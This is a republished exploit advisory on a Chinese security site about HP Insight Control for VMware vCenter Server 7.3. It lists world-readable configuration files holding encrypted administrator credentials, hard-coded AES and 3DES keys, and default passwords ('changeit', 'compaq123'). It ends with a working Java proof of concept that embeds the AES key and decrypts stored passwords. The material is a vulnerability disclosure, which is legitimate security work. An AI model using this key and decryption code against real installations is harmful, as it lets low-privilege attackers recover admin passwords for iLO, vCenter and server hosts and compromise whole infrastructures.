首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Insight Control For VMware vCenter Server 7.3 Insecure Permissions Vulnerabil
来源:vfocus.net 作者:Glafkos 发布时间:2018-01-02  
/*
Exploit Title: HP Insight Control for VMware vCenter Server Multiple Vulnerabilities
Author: Glafkos Charalambous
Version: 7.3
Vendor: HP
Vendor URL: http://www.hpe.com
HP Case: SSRT101619
  
Product Description: HP Insight Control for VMware vCenter Server (Insight Control for vCenter) is a single integrated application that you use to manage ProLiant servers and/or HP storage systems. The application consists of four modules. The core module is required along with at least one of the three optional
components.
  
Impact:
A low privilege attacker can read sensitive information files, decrypt all configuration server passwords and gain access to the above systems which in turn lead to the compromise of the whole infrastructure.
  
Vulnerabilities:
  
Local Insecure File Permissions Vulnerability
A local attacker can exploit this issue by gaining access to low privileged readable files and extracting sensitive information.
  
VMware vCenter Physical and Virtual Infrastructure configured servers include IP Addresses, Usernames and Encrypted passwords  
C:\Program Files (x86)\HP\HP Insight Control for vCenter\icvc\hpcs\password.xml
Ex:
  <password>
    <username>Administrator</username>
    <epassword>1Od6BZ6oCIkr5HY*********4F0Za0DJVR3tcDcwA=</epassword>
    <host>172.30.8.101</host>
    <type>Onboard Administrator</type>
    <id>beae31de-fdf8-11e2-9c3e-005056ae52ee</id>
  </password>
  <password>
    <username>root</username>
    <epassword>q75k41lRU+RRQyuk*********QUGjPrB2l6+8VmiW1I=</epassword>
    <host>172.30.8.161</host>
    <type>ProLiant Server</type>
    <id>f0df9f00-fdf8-11e2-bf51-005056ae52ee</id>
  </password>
   <password>
    <username>Administrator</username>
    <epassword>BC6j1QquVE1p*********hLdHMUOfRhcMLoE=</epassword>
    <host>172.30.8.129</host>
    <type>iLO</type>
    <id>f7f0fd0f-0b28-11e3-8753-005056ae52ee</id>
  </password>
  <password>
    <username>vadmin</username>
    <epassword>kbdDWTHKDfx***********49eI93rDL+xRsJu1V8=</epassword>
    <host>172.30.8.198</host>
    <type>vCenter</type>
    <id>d6c21e0f-99f5-11e3-ad68-005056ae52ee</id>
  </password>
    
    
C:\Program Files (x86)\HP\HP Insight Control for vCenter\icvc\uim\config.json
Ex:   
  "db": { // Local Postgress 
      "username": "ic4vcdb", 
      "ip": "localhost", 
      "password": "qoelX2yfccmhtDdsHOKAE*********************JXbUFK4ANHoyznp4niXWJzx", 
      "port": "3506"
    }, 
    "vcenters": [
      {
        "username": "vadmin", 
        "ip": "172.30.9.183", 
        "password": "dmNsOek/My2dND7*************/RxgMe/30JJ2nTI="
      }
  
Use of Hard-Coded Cryptographic Keys
Java EE Enteprise Archive (EAR) Files containing hard-coded AES CBC 128bit and 3DES encryption keys that are being used to encrypt configuration files which include password information
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\deployments\app_hpicsm_ear.ear
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\deployments\credentialStore_ear.ear
Etc..
  
Files containing Usernames and Encrypted 3DES Passwords (3DES Hardcoded Key: <A class=__cf_email__ href="/cdn-cgi/l/email-protection" data-cfemail="faaeb288ba8d9394bd">[email protected]</A> s*m3 junk !$$248$#*&^)
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\hp_roles.properties
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\hp_users.properties
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\mgmt-users.properties
  
Use of default Keystore / Certificate Private Key Password
Keystore and PKCS #12 certificate containing private keys using a default password of "changeit"
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\vasa.keystore (Default keystore pass changeit)
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\server.p12 (Default password changeit)
  
Use of default password of HP Common Services Password
    <username>compaq</username>
    <epassword>nhEeBy2mlbTbkitvVtAt2E0mnS5SXjCBE3JKtTGKru4=</epassword> = compaq123
    <host>*</host>
    <type>HP Common Services</type>
  
  
PoC AES-128-CBC Password Decryption 
*/
  
import java.security.GeneralSecurityException;
import java.security.Key;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import org.apache.commons.net.util.Base64;
  
  
public class Start {
  
    private static final byte[] IV = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    private static final byte[] KEY = { 116, 111, toUnsigned(155), 34, toUnsigned(240), 47, 126, toUnsigned(157), 19, 33, 75, 32, 26, 27, 122, toUnsigned(134) };
      
    public static void main(String[] args) {
        
      String ePassword = "qoelX2yfccmhtDdsHOKAE2W8R82buPd6jQX6AlqJ6JXbUFK4ANHoyznp4niXWJzx";
      String decryptedPassword = decrypt(ePassword);
      System.out.println("Password is: " + decryptedPassword);
  
      }
      
    public static String decrypt(String encryptedString)
    {
      try
      {
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
        Key key = new SecretKeySpec(KEY, 0, KEY.length, "AES");
        IvParameterSpec iv = new IvParameterSpec(IV, 0, IV.length);
        cipher.init(2, key, iv);
        byte[] encryptedBytes = Base64.decodeBase64(encryptedString.getBytes());
          
        cipher.update(encryptedBytes);
        byte[] decryptedBytes = cipher.doFinal(encryptedBytes);
        String decryptedString = new String(decryptedBytes, 16, decryptedBytes.length - 16);
        return decryptedString.trim();
          
      }
      catch (GeneralSecurityException e)
      {
        System.out.println("Password Decryption Error");
      }
      return null;
    }
      
    private static final byte toUnsigned(int value)
    {
      if (value < 128) {
        return (byte)value;
      }
      return (byte)(value - 256);
    }
      
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kingsoft Antivirus/Internet Se
·pfSense 2.1.3-RELEASE (amd64)
·ALLMediaServer 0.95 - Buffer O
·ALLMediaServer 0.95 - Buffer O
·DotNetNuke DreamSlider 01.01.0
·NetTransport 2.96L - Buffer Ov
·SysGauge Server 3.6.18 - Denia
·D3DGear 5.00 Build 2175 - Buff
·Telesquare SKT LTE Router SDT-
·HP Mercury LoadRunner Agent ma
·Sendroid < 6.5.0 - SQL Injecti
·Cambium ePMP1000 - 'ping' Shel
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved